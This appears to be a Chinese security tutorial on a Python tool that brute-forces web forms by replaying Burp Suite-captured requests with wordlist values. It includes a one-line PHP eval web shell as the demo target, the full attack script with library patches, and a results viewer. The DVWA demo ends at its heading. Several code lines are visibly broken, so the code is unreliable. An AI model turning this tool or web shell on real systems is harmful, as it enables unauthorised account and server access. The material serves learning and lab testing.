python与Burp Suite联动暴力破解



python与Burp Suite联动暴力破解

程序直接使用BP抓取的原包进行暴力破解

关键点:argparse库、pandas库、HackRequests库、Burp Suite。
思路:
<1>.页面提交pybf1=username&pybf2=password等格式的数据;
<2>.Burp Suite抓取原始数据包放入req.txt文件;
<3>.BFhttp.py取原始数据包将pybf1、pybf2…pybfn等替换成字典内容
<4>.利用HackRequests库暴力破解;
<5>.利用pandas库处理保存数据或保存为json数据在html页面上显示

演示1.暴力破解一句话木马

<1>.页面提交pybf1=username&pybf2=password等格式的数据;
一句话木马caidoa:

<?php@eval($_POST['cmd']);
// NOTE(review): demo target only. The POST field 'cmd' is passed straight to eval(),
// and the leading '@' suppresses any error output. The field name is the only
// "secret" protecting it. Defenders: treat eval()/assert() fed directly from
// $_POST/$_REQUEST in a web root as a web-shell indicator.
?>


<2>.Burp Suite抓取原始数据包放入req.txt文件;
<3>.BFhttp.py取原始数据包将pybf1、pybf2…pybfn等替换成字典内容
<4>.BFhttp.py利用HackRequests库暴力破解;
BFhttp.py文件源码:

# coding=utf-8
# NOTE(review): the published listing had lost its line breaks. The indentation
# below is reconstructed from syntax; the nesting of a few trailing statements
# (for example the final print in saveresult) should be confirmed against the
# author's original file.
import argparse
import re
import itertools
import sys
import time
import pandas
from urllib3.connectionpool import xrange
import HackRequests
import numpy as np
import pandas as pd
import html5lib


class BFhttp(object):
    """Replay a captured raw HTTP request with pybfN placeholders filled from wordlists.

    Each response is compared with a baseline response and summarised
    (payload, Same/Different, status code, body length) in ``self.result``.
    """

    def __init__(self, args):
        """Keep the parsed CLI arguments and create the queue, client and accumulators."""
        self.args = args
        self.payloads = []
        self.payloadsQueue = HackRequests.queue.Queue()  # FIFO queue: the first task added is the first one retrieved
        self.hack = HackRequests.hackRequests()
        self.result = {}
        self.result2 = []
        self.pwdlength = 0
        self.number = 0

    def parseRaw(self):
        """Read the raw request saved in ``args.reqfile`` into ``self.raw``."""
        with open(self.args.reqfile) as f:
            self.raw = f.read()

    def parsePayloads(self):
        """Append every line of every wordlist file to the single flat list ``self.payloads``."""
        for i in range(self.payloadLenght):
            # NOTE(review): the file object is never closed; no encoding is given,
            # so the platform default is used.
            f = open(self.args.payloads[i], 'r')
            for p in f:
                self.payloads.append(p.rstrip())

    def getOrgRes(self):
        """Send the unmodified raw request once and take its body as the baseline."""
        html = self.hack.httpraw(self.raw).text()
        # NOTE(review): as written this binds a function-local name. No `global`
        # statement or `self.` prefix is visible, so _callback's read of
        # `selfData` would not see this value. Confirm against the original.
        selfData = html

    def nowTime(self):
        """Return the current time as seconds since the epoch."""
        return time.time()

    def _callback(self, r: HackRequests.response, ywlstr):
        """Record one response; passed as the ``callback`` of HackRequests.threadpool.

        ``ywlstr`` is the payload string forwarded by the author's modified
        threadpool. The row stores id, payload, Same/Different versus the
        baseline body, status code and body length.
        """
        if selfData == r.text():
            bruteSate = "Same"
        else:
            bruteSate = "Different"
        # payloads = "\"" + str(ywlstr) + "\""
        # id = "\"" + str(self.number) + "\""
        payloads = str(ywlstr)
        id = str(self.number)
        self.result.setdefault('id', []).append(id)
        self.result.setdefault('payloads', []).append(payloads)
        self.result.setdefault('bruteSate', []).append(bruteSate)
        self.result.setdefault('status_code', []).append(r.status_code)
        self.result.setdefault('text_len', []).append(len(r.text()))
        # NOTE(review): the counter and lists are updated without a lock; whether
        # the pool invokes callbacks concurrently is not visible here.
        self.number = self.number + 1

    def saveresult(self):
        """Build a DataFrame from ``self.result``, print it, and export it per ``args.outputmode``."""
        data = self.result
        ser1 = pd.DataFrame(data, index=pd.Series(range(self.number)))
        pandas.set_option('display.width', 1000)  # display width in characters
        pandas.set_option('display.max_rows', None)  # show all rows
        pandas.set_option('display.max_columns', None)  # show all columns
        if self.args.outputmode == "csv":
            if self.args.outfile:
                # The open/close pair only creates or truncates the target file.
                f = open(self.args.outfile, 'w')
                f.close()
                ser1.to_csv(self.args.outfile, index=False)
                message = self.args.outfile
            else:
                # NOTE(review): this default branch touches 'excel.xlsx' and calls
                # to_excel() with a '.csv' name, which looks like a copy/paste slip
                # from the excel branch.
                f = open('excel.xlsx', 'w')
                f.close()
                ser1.to_excel('example.csv', sheet_name='Sheet1')
                message = 'example.csv'
        if self.args.outputmode == "excel":
            if self.args.outfile:
                f = open(self.args.outfile, 'w')
                f.close()
                ser1.to_excel(self.args.outfile, sheet_name='Sheet1')
                message = self.args.outfile
            else:
                f = open('excel.xlsx', 'w')
                f.close()
                ser1.to_excel('excel.xlsx', sheet_name='Sheet1')
                message = 'excel.xlsx'
        if self.args.outputmode == "html":
            self.saveResult()
            # NOTE(review): saveResult() writes data\data.txt, not json.txt.
            message = "Please use json.html+json.js+json.txt"
        if self.args.outputmode:
            # NOTE(review): `message` is unbound if outputmode is set to a value
            # other than csv/excel/html.
            print("=====================\n")
            print("created:" + message + "\n")
            print("=====================\n")
        print(ser1)

    def run(self):
        """Load the wordlists, build the payload tuples, take the baseline, queue the work and start."""
        self.payloadLenght = len(self.args.payloads)
        self.parsePayloads()
        # NOTE(review): `itertoolsbinations` is not a defined name. It looks like an
        # itertools call damaged when the page was extracted; confirm against the
        # original source.
        self.payloads = list(itertoolsbinations(self.payloads, self.payloadLenght))
        self.payloads = list(set(self.payloads))  # de-duplicate
        self.parseRaw()
        self.getOrgRes()
        for p in xrange(len(self.payloads)):
            self.payloadsQueue.put(self.payloads[p])  # put the item on the queue
        self.start()

    def parseRawb(self, count, payloads):
        """Replace placeholder ``pybf<count+1>`` in ``self._raw`` with ``payloads[count - 1]``.

        The Content-Length header value is first adjusted by the difference in
        length between the placeholder and its replacement.
        """
        keyWord = 'pybf' + str(count + 1)
        # With count == 0 the index count - 1 is -1, i.e. the last tuple element.
        try:
            Content_Length = re.findall('Content-Length: (.*?)\n', self._raw)[0].rstrip()
            if len(keyWord) > len(payloads[count - 1]):
                sub = len(keyWord) - len(payloads[count - 1])
                NewContent_Length = int(Content_Length) - sub
                # str.replace rewrites every occurrence of the old digits in the
                # request, not only the header value.
                self._raw = self._raw.replace(re.findall('Content-Length: (.*?)\n', self._raw)[0].rstrip(),str(NewContent_Length))
            elif len(keyWord) < len(payloads[count - 1]):
                sub = len(payloads[count - 1]) - len(keyWord)
                NewContent_Length = int(Content_Length) + sub
                self._raw = self._raw.replace(re.findall('Content-Length: (.*?)\n', self._raw)[0].rstrip(),str(NewContent_Length))
        except Exception as e:
            # Any failure (e.g. no Content-Length header) is silently ignored.
            pass
        finally:
            self._raw = self._raw.replace(keyWord, payloads[count - 1])

    def start(self):
        """Drain the payload queue into the HackRequests thread pool, run it, then save results."""
        self._queue = self.payloadsQueue
        self.lenght = self.payloadLenght
        self._raw = self.raw
        # NOTE(review): timeout reads the module-level `args`, not self.args, so
        # this only works when the file is run as a script.
        threadpool = HackRequests.threadpool(threadnum=self.args.thread, callback=self._callback, timeout=args.timeout)
        while not self._queue.empty():  # empty() returns True when the queue is empty, otherwise False
            payloads = self._queue.get_nowait()  # equivalent to get(False): remove and return one item
            for i in range(self.lenght):
                self.parseRawb(i, payloads)
            threadpool.httpraw(raw=self._raw,ywlstr=str(payloads))
            self._raw = self.raw  # restore the template for the next payload tuple
        threadpool.run()
        self.saveresult()

    def saveResult(self):
        """Write ``self.result`` to ``data\\data.txt`` as JSON-like text for the HTML viewer."""
        # NOTE(review): this is str() of a dict with quotes rewritten, not real JSON
        # encoding. A payload containing quotes, backslashes or parentheses can
        # yield text the viewer's JSON.parse rejects; json.dumps would avoid that.
        data = str(self.result)
        if self.payloadLenght == 1:
            data = data.replace('\'', '\"')
            data = data.replace('"("', '\"')
            data = data.replace('",)"', '\"')
        else:
            data = data.replace('\'', '\"')
            data = data.replace('"(', '[')
            data = data.replace(')"', ']')
        # '\d' is not a recognised escape, so the backslash is kept literally; the
        # path is Windows-style and the 'data' directory must already exist.
        f = open('data\data.txt', 'w')
        f.write(data)
        f.close()


if __name__ == '__main__':
    # Banner (its line breaks were lost in the published listing).
    print('''author:ywl_   __ __  _   _| |_| |__   ___  _ __| '_ \| | | | __| '_ \ / _ \| '_ \\| |_) | |_| | |_| | | | (_) | | | || .__/ \__, |\__|_| |_|\___/|_| |_||_|    |___/''')
    parser = argparse.ArgumentParser(description="httpBruteForce Tool Ver:1.0")
    parser.add_argument("-n", "--thread", metavar="", type=int, default=10, help="Thread Count default is 10")
    parser.add_argument("-t", "--timeout", metavar="", type=int, default=2, help="timeout default is 2")
    parser.add_argument("-r", "--reqfile", metavar="", help="raqFile")
    parser.add_argument("-p", "--payloads", nargs="*", help="Payloads,pybfn...pybf2,pybf1")
    parser.add_argument("-om", "--outputmode", type=str, help="outputmode: csv,excel,html")
    parser.add_argument("-of", "--outfile", type=str, default="",help="output file address,default is current location")
    args = parser.parse_args()
    # Both the request file and at least one wordlist are required; otherwise show help.
    if args.reqfile and args.payloads:
        try:
            # NOTE(review): this rebinds the class name BFhttp to the instance.
            BFhttp = BFhttp(args)
            BFhttp.run()
        except KeyboardInterrupt:
            sys.exit(-1)
        # NOTE(review): exits with status 1 even after a normal run.
        sys.exit(1)
    else:
        parser.print_help()
'''运行步骤:<1>.提交pybf1..<2>.在Burp Suite抓取完整包copy入req.txt<3>.python BFhttp.py -r req.txt -p password.txtpython BFhttp.py -r req.txt -p password.txt -om csvpython  BFhttp.py -r req.txt -p password.txt -om excelpython BFhttp.py -r req.txt -p user.txt -om htmlpython BFhttp.py -r req2.txt -p password.txt user.txt -om html
'''

代码简单易懂,利用了HackRequests库的多并发。HackRequests库的源码可以在网上找到,体积不大。为了方便记录数据,对HackRequests库中HackRequests.py的部分函数作如下修改:

    def httpraw(self, raw: str, ssl: bool = False, proxy=None, location=True, ywlstr= str):
        """Queue one raw-request job together with a caller-supplied label ``ywlstr``.

        The label is carried in the job dict so that ``scan`` can hand it to the
        callback with the response.
        """
        # NOTE(review): the default for ywlstr is the built-in type `str` itself,
        # not a string value; callers are presumably expected to always pass it.
        func = self.hack.httpraw
        self.queue.put({"func": func, "raw": raw, "ssl": ssl,"proxy": proxy, "location": location, "ywlstr": ywlstr})

    def scan(self):
        """Worker loop: take jobs off the queue, run them, pass result and label to the callback."""
        while 1:
            if self.queue.qsize() > 0 and self.isContinue:
                p = self.queue.get()
            else:
                break
            func = p.pop("func")
            url = p.get("url", None)
            ywlstr = p.get("ywlstr", None)
            try:
                if url is None:
                    raw = p.pop('raw')
                    # get() above does not remove "ywlstr", so it is still in **p;
                    # the wrapped httpraw must accept that keyword (not shown here).
                    h = func(raw, **p)
                else:
                    h = func(url, **p.get("kw"))
                self._callback(h,ywlstr=ywlstr)
            except Exception as e:
                # Errors are printed and the loop continues with the next job.
                print(url, e)
        # NOTE(review): placement after the loop is reconstructed from a collapsed
        # listing. Confirm against the original HackRequests.py.
        self.changeThreadCount(-1)

演示结果:


保存为json数据在html页面上显示:

<!-- Results viewer: json.js fetches data.txt and fills the #tbody table body. The Bootstrap and jQuery paths are relative and must exist next to this file. -->
<!DOCTYPE html>
<html><head><title>结果</title><link href="bootstrap-3.0.0/dist/css/bootstrap.min.css" rel="stylesheet" media="screen"><meta charset="utf-8"><script src="jquery-3.5.1/jquery-3.5.1.min.js"></script><script src="json.js"></script></head><body><h1 align="center">[扫描结果]</h1><div id="json"><table class="table table-bordered" id="python"><thead><tr><th><p align="center">id <button id="bt1" class="glyphicon glyphicon-chevron-down btn-xs btn btn-default active"></button></p></th><th><p align="center">payload</p></th><th><p align="center">bruteSate <button id="bt3" class="glyphicon glyphicon-chevron-down btn-xs"></button></p></th><th><p align="center">status_code <button id="bt4" class="glyphicon glyphicon-chevron-down btn-xs"></button></p></th><th><p align="center">text_len <button id="bt5" class="glyphicon glyphicon-chevron-down btn-xs"></button></p></th></tr></thead><tbody id="tbody"></tbody></table></div></body>
</html>

js文件:

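// Result viewer script: loads data.txt and renders one table row per request.
// The data set is column-oriented:
//   { id: [], payloads: [], bruteSate: [], status_code: [], text_len: [] }
var data;
var COLUMNS = ["id", "payloads", "bruteSate", "status_code", "text_len"];

var xmlhttp = new XMLHttpRequest();
xmlhttp.onreadystatechange = function () {
    if (this.readyState == 4 && this.status == 200) {
        try {
            data = JSON.parse(this.responseText);
        } catch (e) {
            // data.txt is produced by string replacement, so it may not be valid JSON.
            console.error("data.txt is not valid JSON:", e);
            return;
        }
        var sort = 1;
        getdata(sort);
    }
};
xmlhttp.open("GET", "data.txt", true);
xmlhttp.send();

/**
 * Escape a value for use inside HTML text or a double-quoted attribute.
 * Payload strings come from wordlist files and must not be parsed as markup
 * when the table is assigned through innerHTML.
 */
function escapeHtml(value) {
    return String(value)
        .replace(/&/g, "&amp;")
        .replace(/</g, "&lt;")
        .replace(/>/g, "&gt;")
        .replace(/"/g, "&quot;")
        .replace(/'/g, "&#39;");
}

/** Swap rows a and b in every column so the columns stay aligned. */
function swapRows(a, b) {
    for (var c = 0; c < COLUMNS.length; c++) {
        var col = data[COLUMNS[c]];
        var held = col[a];
        col[a] = col[b];
        col[b] = held;
    }
}

/** Move every row for which keep(rowIndex) is true to the front, by swapping. */
function bringToFront(keep) {
    var flag = 0;
    for (var i = 0; i < data.text_len.length; i++) {
        if (keep(i)) {
            swapRows(i, flag);
            flag += 1;
        }
    }
}

/**
 * Reorder the loaded data in place and redraw the table body.
 *
 * @param sort 5: text_len descending; 4: status 200 rows first;
 *             3: "Different" rows first; any other value: current order.
 * @param size badge font size in px (default 20).
 */
function getdata(sort, size = 20) {
    var px = parseInt(size, 10);
    if (isNaN(px)) {
        px = 20;
    }

    if (sort == 5) {
        // Bubble sort, largest body length first.
        var lens = data.text_len;
        for (var i = 0; i < lens.length - 1; i++) {
            for (var j = 0; j < lens.length - 1 - i; j++) {
                if (lens[j] < lens[j + 1]) {
                    swapRows(j, j + 1);
                }
            }
        }
    } else if (sort == 4) {
        bringToFront(function (row) { return data.status_code[row] == 200; });
    } else if (sort == 3) {
        bringToFront(function (row) { return data.bruteSate[row] == "Different"; });
    }

    var cell = function (value) {
        return '<td><p align="center"><span style="font-size:' + px + 'px" class="badge">'
            + escapeHtml(value) + '</span></p></td>';
    };

    var tbody = '';
    for (var r = 0; r < data.id.length; r++) {
        tbody += '<tr class="active">'
            + cell(data.id[r])
            + cell(data.payloads[r])
            + cell(data.bruteSate[r])
            + cell(data.status_code[r])
            + cell(data.text_len[r])
            + '</tr>';
    }
    document.getElementById("tbody").innerHTML = tbody;
}

$(document).ready(function () {
    var idleClass = "glyphicon glyphicon-chevron-down btn-xs";
    var activeClass = "glyphicon glyphicon-chevron-down btn-xs btn btn-default active";

    // Highlight the clicked sort button, then run its action.
    function bindSortButton(selector, action) {
        $(selector).click(function () {
            $("button").attr("class", idleClass);
            $(selector).attr("class", activeClass);
            action();
        });
    }

    // bt1 reloads the page, which restores the order stored in data.txt.
    bindSortButton("#bt1", function () { history.go(0); });
    bindSortButton("#bt3", function () { getdata(3); });
    bindSortButton("#bt4", function () { getdata(4); });
    bindSortButton("#bt5", function () { getdata(5); });
});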

路径需要大家自己修改下,显示结果如下:

还可以输出为csv,excel格式文件:
python BFhttp.py -r req.txt -p password.txt -om csv -of data.csv

python BFhttp.py -r req.txt -p password.txt -om excel -of excel.xlsx

演示2.暴力破解DVWA


